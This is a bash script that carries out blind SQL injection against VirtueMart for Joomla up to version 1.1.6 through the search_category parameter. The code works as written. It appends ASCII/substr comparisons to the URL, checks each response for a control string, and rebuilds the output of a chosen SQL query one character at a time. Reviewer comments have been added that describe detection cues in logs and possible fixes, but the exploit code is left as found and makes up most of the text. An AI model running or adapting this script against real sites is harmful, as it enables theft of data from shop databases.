#!/bin/bash
#
# VirtueMart eCommerce for JOOMLA <= 1.1.6 BLIND SQL INJECTION EXPLOIT
# by Andrea Fabrizi
# http://www.andreafabrizi.it
#
# Review notes (defender's reading of the script):
# The script is a boolean-based blind SQL injection driver: it appends a
# comparison clause to the last query-string parameter, fetches the page once
# per candidate character, and decides true/false by grepping the response for
# a control string. The inline comments below describe the traffic pattern it
# produces and where the server-side fix belongs; the code itself is left as
# found.
#
# Server-side mitigation is the usual one for this class of bug: the vulnerable
# parameter (search_category) is used as a numeric value, so a parameterized
# query or an integer cast before use would presumably reject the appended
# clause outright — TODO confirm against the affected VirtueMart code.

#IMPORTANT: search_category must be the LAST parameter in the query string
# The injected clause is concatenated directly onto the end of this string
# (see the wget call in the inner loop), which is why the parameter being
# probed has to be the final one.
URL="http://127.0.0.1/index.php?page=shop.browse&option=com_virtuemart&Itemid=1&keyword1=hand&search_op=and&&search_limiter=anywhere&search=Search&search_category=3"

#SQL query to enumerate
# The result of this subquery is extracted one character per position by the
# loops below.
QUERY="select database()"

#String to match in the page when the query is valid (e.g. and 1=1)
# This is the boolean oracle: a response containing the string is read as
# "the injected comparison was true". Any content that differs between the two
# branches would serve the same purpose.
TXT_CONTROL="Ladder"

# Candidate characters tried, in this order, for every output position. Every
# miss costs one HTTP request, so the request volume per recovered character is
# bounded by the size of this list.
CHARSET="a b c d e f g h i l m n o p q r s t u v z w y k j x 1 2 3 4 5 6 7 8 9 0 A B C D E F G H I L M N O P Q R S T U V Z W Y K J X . _ \! \: \/ \\ \#"

# Session bootstrap: a single request that only stores cookies. Two details a
# log reviewer can key on: the fixed User-Agent value "null", and the fact that
# the same client then issues a long burst of near-identical GETs.
# The cookie jar is a fixed, predictable path under /tmp — a classic
# symlink/tmp-race hazard for whoever runs the script (mktemp is the idiom).
echo -ne "- Getting cookies... "
wget -O /dev/null --user-agent="null" --quiet --keep-session-cookies --save-cookies=/tmp/sqlcookie "$URL"
# Only wget's exit status is checked; whether a session cookie was actually
# received is not verified.
if [ $? -eq 0 ]; then
	echo -e "OK\n- Starting enumeration...\n"
else
	echo -e "Error!"
	exit 1
fi

# Outer loop: one output position (j) per iteration. Enumeration stops at the
# first position for which no charset entry produces a "true" response.
j=0
while (true); do
	let j=$j+1
	echo -e -n "$j) ";
	found=0
	# Inner loop: one GET per candidate character. Consecutive requests differ
	# only in the position index and the 0x.. constant — a highly regular
	# pattern, and the "and ASCII(substr((" / " -- " fragments appear verbatim
	# in the query string of every request, which makes the activity easy to
	# spot in web-server logs or with a request-inspection rule.
	for i in $CHARSET; do
		echo -n "."
		# printf's leading-quote form ("'c") yields the character code of the
		# first character of $i; it is emitted as hex so the SQL payload can
		# compare against a 0x.. literal without needing quote characters.
		n=$(printf '%x' "'$i")
		# The page is fetched with the saved cookies and grepped for the control
		# string; a non-empty grep result is treated as the "true" branch. Note
		# that wget's own exit status is lost inside the pipeline, so a transport
		# failure is indistinguishable from a "false" answer here.
		RES=$(wget -O - --user-agent="null" --quiet --load-cookies=/tmp/sqlcookie "$URL and ASCII(substr(($QUERY),$j,1))=0x$n -- " | grep "$TXT_CONTROL")
		if [ "$RES" != "" ]; then
			echo -e " -> $i"
			found=1
			RESULT="${RESULT}$i"
			break;
		fi;
	done;
	# No candidate matched at this position: end of the result, a character
	# outside CHARSET, or a failed/blocked request all look the same and end
	# the enumeration.
	if [ $found -ne 1 ]; then
		break;
	fi
done;
echo -e "\n\n -> $RESULT\n"